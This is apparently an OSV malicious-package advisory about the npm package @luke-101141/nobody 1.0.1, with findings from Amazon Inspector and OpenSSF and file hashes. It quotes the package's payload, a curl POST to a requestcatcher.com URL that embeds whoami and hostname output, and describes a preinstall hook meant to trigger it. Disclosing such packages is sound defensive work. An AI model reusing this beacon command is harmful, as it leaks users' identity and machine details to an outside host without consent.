{"id":"MAL-2026-4229","summary":"Malicious code in @luke-101141/nobody (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (8a22de475581dbf26085c2605781782a61205eb62add0a261eabe2357ac2cbc8)\nOn require(), index.js executes `curl -X POST \"http://frgthyujiouyh.requestcatcher.com/noderedactedsdk/$(whoami)/$(hostname)/\"`, leaking the installing user's identity and machine hostname over plaintext HTTP to an anonymous request-inspection service (requestcatcher.com) commonly used as a throwaway exfil sink. The package has no advertised functionality — empty description, no useful exports — its sole effect is the identity beacon. package.json also contains a top-level `\"preinstall\": \"node index.js\"` field outside the `scripts` block; as written it does not fire at install time, but the intent to trigger the same payload at `npm install` is explicit. Any consumer importing this package leaks host/user identity to the attacker.\n\n## Source: ossf-package-analysis (cd4cb72508248900987f8bd099896c95e232fee57835b5a89ac6b0d3178c2ed7)\nThe OpenSSF Package Analysis project identified '@luke-101141/nobody' @ 1.0.1 (npm) as malicious.\n\nIt is considered malicious because:\n\n- The package executes one or more commands associated with malicious behavior.\n","modified":"2026-05-27T23:16:43.048173591Z","published":"2026-05-21T13:18:52Z","database_specific":{"malicious-packages-origins":[{"sha256":"cd4cb72508248900987f8bd099896c95e232fee57835b5a89ac6b0d3178c2ed7","source":"ossf-package-analysis","import_time":"2026-05-21T22:53:48.245127954Z","versions":["1.0.1"],"modified_time":"2026-05-21T13:31:26Z"},{"sha256":"8a22de475581dbf26085c2605781782a61205eb62add0a261eabe2357ac2cbc8","versions":["1.0.1"],"id":"IN-MAL-2026-003819","import_time":"2026-05-26T05:51:22.838518518Z","source":"amazon-inspector","modified_time":"2026-05-21T13:18:52Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/@luke-101141/nobody/v/1.0.1"}],"affected":[{"package":{"name":"@luke-101141/nobody","ecosystem":"npm","purl":"pkg:npm/%40luke-101141%2Fnobody"},"versions":["1.0.1"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@luke-101141/nobody/MAL-2026-4229.json","cwes":[{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."}],"indicators":{"package_integrity":[{"hashes":{"sha1":"5a0cbf29659f7fece79c521746a19f0faa7c4376","sha512_sri":"sha512-D27Eh35JzuckGv3gBLQqbpXixCDeRLfohET6SPUqcm4i7zVYwPhArUa07lKgDihfnaBEOAfmz3CzgPPFLthWsg=="},"filename":"nobody-1.0.1.tgz"}],"evidence_files":[{"sha256":"49be609680fa7f470d893f23ea379e7336ae84fc14521dd9f14df859646ce1c3","tlsh":"0be07d0e1cf88d3a723354a5f948581ba68bdb101237f0d2a89e1509038998448182cb","path":"index.js"},{"sha256":"5289d5e4b19c6d1ec270927d4147db913fe9dc77c05fd09b25bfbf9356ad7be2","tlsh":"09d05e380d61953326c40a66096ba45766a18f2f00287c0897db583890debb7a8ff36d","path":"package.json"}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["actran@amazon.com"],"type":"FINDER"},{"name":"OpenSSF: Package Analysis","contact":["https://github.com/ossf/package-analysis","https://openssf.slack.com/channels/package_analysis"],"type":"FINDER"}]}